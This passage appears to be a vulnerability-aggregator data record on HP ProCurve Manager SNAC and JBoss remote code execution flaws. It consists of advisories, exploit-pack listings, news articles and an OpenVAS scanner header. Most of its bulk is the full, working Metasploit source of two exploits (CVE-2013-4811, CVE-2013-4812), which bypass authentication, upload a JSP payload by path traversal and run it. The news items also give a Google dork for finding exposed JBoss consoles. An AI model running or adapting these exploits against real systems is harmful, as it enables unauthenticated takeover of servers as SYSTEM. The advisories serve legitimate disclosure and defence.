arbitrary\r\n files, just having into account binary writes aren't allowed. 
Additionally, authentication\r\n can be bypassed in order to upload the file. This module has been tested successfully on\r\n the SNAC server installed with HP ProCurve Manager 4.0.\r\n },\r\n 'Author' =>\r\n [\r\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-4811' ],\r\n [ 'OSVDB', '97154' ],\r\n [ 'BID', '62349' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-226/' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true,\r\n },\r\n 'DisclosureDate' => 'Sep 09 2013'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443)\r\n ], self.class )\r\n end\r\n\r\n def check\r\n session = get_session\r\n if session.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/RegWeb/RegWeb/GetDomainControllerServlet\",\r\n 'cookie' => session\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /domainName/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_session\r\n res = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" })\r\n session = nil\r\n if res and res.code == 200\r\n session = res.get_cookies\r\n end\r\n\r\n if session and not session.empty?\r\n return session\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def exploit_upload(session)\r\n jsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\"\r\n post_message = Rex::MIME::Message.new\r\n post_message.add_part(payload.encoded, \"application/octet-stream\", nil, \"form-data; name=\\\"adCert\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\")\r\n post_message.add_part(\"{}\", nil, nil, \"form-data; name=\\\"ad_data\\\"\")\r\n post_message.add_part(\"add\", nil, nil, \"form-data; 
name=\\\"ad_action\\\"\")\r\n data = post_message.to_s\r\n data.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/RegWeb/RegWeb/UpdateDomainControllerServlet\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\",\r\n 'cookie' => session,\r\n 'data' => data,\r\n })\r\n\r\n if res and res.code == 200 and res.body =~ /success:false/\r\n return jsp_name\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def peer\r\n return \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Getting a valid session...\")\r\n session = get_session\r\n if session.nil?\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading payload...\")\r\n jsp = exploit_upload(session)\r\n unless jsp\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\")\r\n end\r\n\r\n print_status(\"#{peer} - Executing payload...\")\r\n send_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" })\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/21241", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in HP PCM+ SNAC Registration Server UpdateCertificatesServlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2013-10-10T00:00:00", "type": "dsquare", "title": "HP PCM+ SNAC Registration Server UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-10-10T00:00:00", "id": "E-349", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in HP PCM+ SNAC Registration Server UpdateDomainControllerServlet\n\nVulnerability Type: File Upload", "cvss3": {}, "published": "2013-10-10T00:00:00", "type": "dsquare", "title": "HP PCM+ SNAC Registration Server UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-10-10T00:00:00", "id": "E-344", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:17", "description": "", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "packetstorm", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-17T00:00:00", "id": "PACKETSTORM:123255", "href": "https://packetstormsecurity.com/files/123255/HP-ProCurve-Manager-SNAC-UpdateCertificatesServlet-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject 
to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload', \n'Description' => %q{ \nThis module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The \nvulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary \nfiles, just having into account binary writes aren't allowed. Additionally, authentication \ncan be bypassed in order to upload the file. This module has been tested successfully on \nthe SNAC server installed with HP ProCurve Manager 4.0. \n}, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-4812' ], \n[ 'OSVDB', '97155' ], \n[ 'BID', '62348' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'HP ProCurve Manager 4.0 SNAC Server', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'DisclosureDate' => 'Sep 09 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443) \n], self.class ) \nend \n \ndef check \nsession = get_session \nif session.nil? 
\nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({ \n'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\", \n'cookie' => session \n}) \n \nif res and res.code == 200 and res.body =~ /\"success\":\"true\"/ \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef get_session \nres = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" }) \nsession = nil \nif res and res.code == 200 \nsession = res.get_cookies \nend \n \nif session and not session.empty? \nreturn session \nend \n \nreturn nil \nend \n \ndef exploit_upload(session) \njsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\" \nrand_password = rand_text_alpha(4 + rand(10)) \npost_message = Rex::MIME::Message.new \npost_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\") \npost_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\") \npost_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\") \npost_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\") \ndata = post_message.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\", \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\", \n'cookie' => session, \n'data' => data, \n}) \n \nif res and res.code == 200 and res.body =~ /Certificate import fails/ \nreturn jsp_name \nend \n \nreturn nil \nend \n \ndef peer \nreturn \"#{rhost}:#{rport}\" \nend \n \ndef exploit \nprint_status(\"#{peer} - Getting a valid session...\") \nsession = get_session \nif session.nil? 
\nfail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\") \nend \n \nprint_status(\"#{peer} - Uploading payload...\") \njsp = exploit_upload(session) \nunless jsp \nfail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" }) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123255/hp_pcm_snac_update_certificates.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:12", "description": "", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "packetstorm", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-17T00:00:00", "id": "PACKETSTORM:123256", "href": "https://packetstormsecurity.com/files/123256/HP-ProCurve-Manager-SNAC-UpdateDomainControllerServlet-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload', \n'Description' => %q{ \nThis module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The \nvulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary \nfiles, just having into account binary writes aren't allowed. 
Additionally, authentication \ncan be bypassed in order to upload the file. This module has been tested successfully on \nthe SNAC server installed with HP ProCurve Manager 4.0. \n}, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-4811' ], \n[ 'OSVDB', '97154' ], \n[ 'BID', '62349' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-226/' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'HP ProCurve Manager 4.0 SNAC Server', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'DisclosureDate' => 'Sep 09 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443) \n], self.class ) \nend \n \ndef check \nsession = get_session \nif session.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({ \n'uri' => \"/RegWeb/RegWeb/GetDomainControllerServlet\", \n'cookie' => session \n}) \n \nif res and res.code == 200 and res.body =~ /domainName/ \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef get_session \nres = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" }) \nsession = nil \nif res and res.code == 200 \nsession = res.get_cookies \nend \n \nif session and not session.empty? 
\nreturn session \nend \n \nreturn nil \nend \n \ndef exploit_upload(session) \njsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\" \npost_message = Rex::MIME::Message.new \npost_message.add_part(payload.encoded, \"application/octet-stream\", nil, \"form-data; name=\\\"adCert\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\") \npost_message.add_part(\"{}\", nil, nil, \"form-data; name=\\\"ad_data\\\"\") \npost_message.add_part(\"add\", nil, nil, \"form-data; name=\\\"ad_action\\\"\") \ndata = post_message.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/RegWeb/RegWeb/UpdateDomainControllerServlet\", \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\", \n'cookie' => session, \n'data' => data, \n}) \n \nif res and res.code == 200 and res.body =~ /success:false/ \nreturn jsp_name \nend \n \nreturn nil \nend \n \ndef peer \nreturn \"#{rhost}:#{rport}\" \nend \n \ndef exploit \nprint_status(\"#{peer} - Getting a valid session...\") \nsession = get_session \nif session.nil? 
\nfail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\") \nend \n \nprint_status(\"#{peer} - Uploading payload...\") \njsp = exploit_upload(session) \nunless jsp \nfail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" }) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123256/hp_pcm_snac_update_domain.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2021-07-28T14:32:22", "description": "**Name**| d2sec_hppcm \n---|--- \n**CVE**| CVE-2013-4812 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP PCM+ SNAC Registration Server Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-09-16T13:01:00", "title": "DSquare Exploit Pack: D2SEC_HPPCM", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-16T13:01:00", "id": "D2SEC_HPPCM", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hppcm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_hppcm2 \n---|--- \n**CVE**| CVE-2013-4811 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP PCM+ SNAC Registration 
Server Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-09-16T13:01:00", "title": "DSquare Exploit Pack: D2SEC_HPPCM2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-16T13:01:00", "id": "D2SEC_HPPCM2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hppcm2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-07-05T07:20:05", "description": "A vulnerability has been reported in HP ProCurve Manager SNAC. The vulnerability is due to lack of authentication and directory traversal. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. 
Successful exploitation could result in code execution in the context of SYSTEM account.", "cvss3": {}, "published": "2013-09-30T00:00:00", "type": "checkpoint_advisories", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet Code Execution (CVE-2013-4812)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2017-12-24T00:00:00", "id": "CPAI-2013-2960", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T07:30:23", "description": "A vulnerability has been reported in HP ProCurve Manager SNAC.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet Code Execution (CVE-2013-4811)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2022-07-05T00:00:00", "id": "CPAI-2013-2968", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-05T07:20:03", "description": "A code execution vulnerability has been reported in McAfee Web Reporter due to embedding a vulnerable version of JBoss. The vulnerability is due to a misconfiguration error when handling certain HTTP requests containing marshalled Java objects. A remote unauthenticated attacker could exploit this vulnerability to execute arbitrary code on McAfee Web Reporter with a vulnerable version of JBoss. 
Successful exploitation could result in arbitrary code being executed in the context of the vulnerable application.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution - ver 2 (CVE-2013-4810)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2018-04-22T00:00:00", "id": "CPAI-2013-3503", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:12", "description": "[](<http://2.bp.blogspot.com/-xGy919BMJkM/Uo4h1tgpTyI/AAAAAAAAY5U/Kd9_6rKnQHw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\n[Cyber security](<http://thehackernews.com/search/label/cyber%20security>) of many organizations being attacked at an extremely high rate this month, well another alarming cyber crime report become public today.\n\n \n\n\nA widely unpatched and two years old critical [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in JBoss Application Server (AS) that enable an attacker to remotely get a shell on a vulnerable web server.\n\nJBoss Application Server is an open-source Java EE-based application server very popular, it was designed by JBoss, now a division of Red Hat. 
In late 2012, JBoss AS was named as \"_wildFly_\", since disclosure of the [exploit code](<http://thehackernews.com/search/label/exploit>) many products running the affected JBoss Application Server have been impacted, including some security software.\n\n \n\n\nTens of thousands of enterprise data center servers are vulnerable to this attack, with at least 500 actively compromised, according to the Imperva report. Many systems administrators have yet to properly configure their servers to mitigate the threat, and the number of potential targets has increased over time, making the exploit even more attractive to attackers.\n\n \n\n\nThe number of infections has surged since exploit code called **_pwn.jsp_** was publicly disclosed i.e. October 4th.** pwn.jsp** shell isn't the unique exploit available, Imperva\u2019s Barry Shteiman confirmed the availability of another more sophisticated shell available to attackers. \n\n> \u201c_In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities_,\u201d\n\nA number of Government and Education related websites have been hacked, exploiting the JBoss Application Server vulnerability, where an attacker can obtain a remote shell access on the target system to inject code into a website hosted on the server or steal files stored on the machine.\n\n> \"_The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. 
Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server._\"\n\nImperva researchers demonstrated that JBoss AS is vulnerable to _[remote command execution](<http://thehackernews.com/search/label/remote%20code%20execution>) _via the \u2018_HTTP Invoker_\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).\n\n \n\n\nThe Invoker improperly exposes the management interface, \"_Jboss Application Server is vulnerable to remote command execution via the \u2018HTTP Invoker\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB)_\".\n\n \n\n\nOn Sept. 16th, the National Vulnerability Database issued an advisory warning of a critical remote code execution bug affecting HP ProCurve Manager, it's assigned to the flaw the Common Vulnerability Enumeration code **_[CVE-2013-4810](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>)_** and on October 4th 2013, a security researcher has disclosed the code of an exploit for the JBoss Application Server vulnerability.\n\n \n\n\nAs consequence the security community had witnessed a surge in Jboss AS hacking, the malicious traffic originated from the compromised servers was detected by Imperva\u2019s honey pots.\n\n \n\n\nIn a few weeks an exploit was added to _[exploit-db](<http://www.exploit-db.com/exploits/28713/>)_ that successfully gained shell against a product running **JBoss 4.0.5**.\n\n \n\n\nImperva confirmed that the number of web servers running Jboss Application Server exposing management interfaces has tripled since the initial vulnerability research was public disclosed passing from 7,000 to 23,000.\n\n \n\n\nI have just run the following Google Dork retrieving more than 17000 results:\n\n> _intitle:\u201dJBoss Management Console \u2013 Server Information\u201d \u201capplication server\u201d 
inurl:\u201dweb-console\u201d OR inurl:\u201djmx-console\u201d_\n\n[](<http://3.bp.blogspot.com/-73eMvUVgFOQ/Uo4gzZ5AMKI/AAAAAAAAY5M/tubiO2mjQ1U/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\nIt is possible to note that Google reconnaissance enables the attacker to identify also governmental and educational websites, some of them also result infected. \n\n> \"_Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a [blog entry](<http://nickhumphreyit.blogspot.co.il/2013/10/jboss-42-hacked-by-pwnjsp.html>) posted by one of the attack\u2019s victims. In other cases a more powerful web shell was deployed. In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities._\"\n\nThe concerning aspect of the story is that once again on a two-year-old vulnerability could be easily exploited to compromise a huge quantity of information, the situation is analogue to the [Silverlight](<http://securityaffairs.co/wordpress/19843/hacking/microsoft-silverlight-5-flaw.html>) flaw that manages users of Netflix, the provider of on-demand Internet streaming media.\n", "cvss3": {}, "published": "2013-11-21T04:13:00", "type": "thn", "title": "Two-year-old vulnerability in JBoss Application Servers enables Remote Shell for Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:16:59", "id": "THN:8573602ED2B18F90AC04D8BA8D25E682", "href": "http://thehackernews.com/2013/11/Vulnerability-JBoss-Application-Servers-exploit-code.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:47", "description": "Attackers are 
exploiting a two-year-old vulnerability in JBoss Application Servers that enables a hacker to remotely get a shell on a vulnerable webserver. The number of infections has surged since[ exploit code called pwn.jsp](<http://blog.imperva.com/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection.html>) was publicly disclosed Oct. 4.\n\nResearchers at Imperva said that a number of government and education websites have been compromised, as indicated by data collected through the company\u2019s honeypots. An attacker with remote shell access can inject code into a website run by the server or hunt and peck for files stored on the machine and extract them.\n\nThe vulnerability in the HTTP Invoker service that provides RMI/HTTP access to Enterprise Java Beans, was discovered in 2011 and presented at a number of security events that year.\n\n\u201cThe vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server,\u201d said Imperva\u2019s Barry Shteiman. \u201cOnce the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that application server.\u201d\n\nOn Sept. 16, the National Vulnerability Database issued an [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>) warning of a remote code execution bug affecting HP ProCurve Manager, network management software. The vulnerability was given the NVD\u2019s highest criticality ranking of 10. 
Since then, other products running the affected JBoss Application Server have been identified, including some security software.\n\nWithin three weeks, an exploit was added to [exploit-db](<http://www.exploit-db.com/exploits/28713/>) that successfully gained shell against a product running JBoss 4.0.5.\n\n\u201cImmediately thereafter, we had witnessed a surge in JBoss hacking, which manifested in malicious traffic originating from the infected servers and observed in Imperva\u2019s honeypot array,\u201d Shteiman said.\n\nAccording to Imperva\u2019s analysis, the vulnerability lies in the Invoker service, which operates at the remote management level enabling applications to access the server. The Invoker improperly exposes the management interface, Shteiman said.\n\nCompounding the problem is that in addition to the pwn.jsp shell, Shteiman said there is another more sophisticated shell available to attackers.\n\n\u201cIn these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities,\u201d he said.\n\nImperva also said that the number of webservers running JBoss software has tripled since the initial vulnerability research was made public.\n", "cvss3": {}, "published": "2013-11-19T16:07:59", "type": "threatpost", "title": "JBoss AS Attacks Up Since Exploit Code Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:18:24", "id": "THREATPOST:7E20261F9330304969941B4755E98BAA", "href": "https://threatpost.com/jboss-attacks-up-since-exploit-code-disclosure/102971/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-08T11:04:12", "description": "Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution 
vulnerabilities.", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "openvas", "title": "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4810", "CVE-2012-0874"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103811", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
